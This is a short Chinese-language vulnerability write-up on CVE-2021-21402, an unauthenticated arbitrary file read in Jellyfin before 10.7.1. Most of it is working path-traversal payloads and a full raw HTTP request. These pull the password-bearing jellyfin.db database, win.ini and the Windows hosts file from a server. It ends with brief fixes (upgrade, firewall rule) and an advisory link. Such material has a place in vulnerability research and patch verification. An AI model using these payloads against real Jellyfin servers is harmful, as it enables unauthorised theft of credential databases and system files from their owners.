Jellyfin 任意文件读取漏洞 CVE-2021-21402

漏洞简介：

jellyfin 是一个自由的软件媒体系统，用于控制和管理媒体和流媒体。它是 emby 和 plex 的替代品，它通过多个应用程序从专用服务器向终端用户设备提供媒体。Jellyfin 属于 Emby 3.5.2 的下一代，并移植 .NET 核心框架，以支持完全的跨平台支持。

影响版本：

Jellyfin<10.7.1

漏洞复现：

利用POC：

从服务器下载带有密码的jellyfin.db：

/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ 

未经授权读取windows的文件

GET  /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.aac/

GET /Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/

读取host文件

/Audio/anything/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts/stream.mp3/

读取带有密码的数据库文件

/Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/

GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1

Host:127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

修复建议：

    1、更新至10.7.1版本。

    2、在Web应用防火墙上添加防护规则

参考链接：https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/